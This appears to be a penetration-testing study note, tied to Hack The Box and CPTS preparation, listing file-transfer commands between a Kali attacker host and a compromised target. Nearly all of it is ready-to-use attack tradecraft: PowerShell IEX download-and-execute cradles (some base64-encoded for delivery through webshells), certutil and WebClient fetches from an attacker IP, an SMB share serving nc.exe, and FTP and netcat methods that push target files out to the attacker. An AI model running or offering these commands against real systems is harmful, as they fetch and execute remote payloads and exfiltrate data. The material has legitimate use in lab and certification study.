7 - File Transfers

# Linux Download - base64 encoding ```bash cat <file_name> |base64 -w 0;echo #output encoded base64 string to stdout cat <file_name> |base64 -w 0 > file.out ``` - base64 decoding ```bash echo -n '<encoded_string>' | base64 -d > file.out ``` - `wget` and `curl` ```bash wget http://<Kali_ip>:<port>/<file> -O file.out curl http://<Kali_ip>:<port>/<file> -o file.out ``` --- # Windows Download - base64 decoding ```powershell [IO.File]::WriteAllBytes("C:\Users\Public\<file_name>", [Convert]::FromBase64String("<string>")) ``` - `iwr` ```powershell iwr http://<Kali_ip>:<port>/<file> -usebasicparsing iwr -uri "http://<Kali_ip>:<port>/<file>" -outfile file.out ``` - `iex (iwr)` ```powershell IEX (IWR -uri "http://<Kali_ip>:<port>/<file>" -outfile file.out) echo "IEX (IWR http://10.10.14.197:8000/shell.ps1)" | iconv -t utf-16le | base64 -w 0 #great for webshells or POST requests powershell.exe -Command IEX (IWR http://<Kali_ip>:<port>/<file>) powershell -c "IEX (iwr http://<Kali_ip>:<port>/<file> -usebasicparsing)" powershell IEX (iwr -uri 'http://<Kali_ip>:<port>/<file>') powershell -c "iwr http://<Kali_ip>:<port>/<file> -usebasicparsing | IEX" ``` - `certutil.exe` ```cmd certutil.exe -urlcache -split -f http://<Kali_ip>:<port>/<in.file> file.out ``` - `New-Object Net.WebClient` ```powershell (New-Object Net.WebClient).DownloadString('http://<Kali_ip>/tool.exe','tool.exe') ``` - `iex (New-Object Net.WebClient)` ```powershell IEX(New-Object Net.WebClient).DownloadString('http://<Kali_ip>/tool.exe') echo "IEX(New-Object Net.WebClient).DownloadString('http://<Kali_ip>/tool.exe')" | iconv -t utf-16le | base64 -w 0 #great for webshells or POST requests powershell.exe -Command IEX (New-Object Net.WebClient).DownloadString('http://<Kali_ip>/tool.exe','tool.exe') powershell -c "IEX ((New-Object Net.WebClient).DownloadString('http://<Kali_ip>/tool.exe','tool.exe'))" powershell IEX ((New-Object Net.WebClient).DownloadFile('http://<Kali_ip>/tool.exe')) ``` - `curl` ```powershell curl http://<Kali_ip>:<port>/<file> -o file.out ``` - `wget` ```powershell wget "http://<Kali_ip>:<port>/<file>" -outfile file.out ``` --- # `scp` - Move file from Kali to target - See [[6 - CTFS/CPTS Prep/MEDIA (HTB)|MEDIA (HTB)]] ```bash scp /opt/winPEASx64.exe [email protected]:/users/enox/desktop/winpeas.exe ``` - Move file from target to back ```bash scp [email protected]:/users/enox/desktop/results.txt ~/Documents/htb/boxes/media/results.txt ``` --- # HTTP Server - Setup HTTP server to pull files form Kali ```bash python3 -m http.server <port> #hosts current working dir ``` --- # SMB SERVER - Setup an SMB server to push files to Kali and to pull files from Kali ```bash sudo impacket-smbserver share -smb2support . #hosts current working dir ``` - Pull file from Kali down to WIN ```cmd copy \\<kali_host_ip>\share\nc.exe ``` - Push file from WIN to Kali ```cmd move <target_file> \\<kali_host_ip>\share ``` --- # FTP Server ## Pull - Setup FTP server for pulling files from Kali ```bash sudo python3 -m pyftpdlib --port 21 #hosts current working dir ``` - Download file from Kali using powershell ```powershell (New-Object Net.WebClient).DownloadFile('ftp://<kali_host_ip>/<target_file>.txt', 'C:\Users\Public\<output_file>.txt') ``` ## Push - Setup ftp server for pushing files to Kali ```bash sudo python3 -m pyftpdlib --port 21 --write ``` - Upload file to Kali using powershell ```powershell (New-Object Net.WebClient).UploadFile('ftp://<kali_host_ip>:21/<dest_filename>', 'C:\<path>\<target_file>') ``` --- # Netcat ## Listener on Kali ### Push - Setup listener on Kali and redirect output ```bash nc -lnvp 9001 -q 3 > /tmp/got-the-file ``` - Connect to listener and push file to Kali ```bash nc -q 3 -nv Kali_IP 9001 < /path/to/file ``` ### Pull - Setup listener on Kali and redirect output ```bash nc -lnvp 9001 -q 3 < /tmp/input-file ``` - Connect to listener and pull down file from Kali ```bash nc -q 3 -nv Kali_IP 9001 > /tmp/got-the-file ``` ## Listener on Target ### Push - Setup listener on target and redirect output ```bash nc -q 3 -lnvp 55555 < /path/to/file & ``` - Connect to listener and pull down file from target ```bash nc -nv target-ip 55555 -q 3 > /tmp/got-the-file ```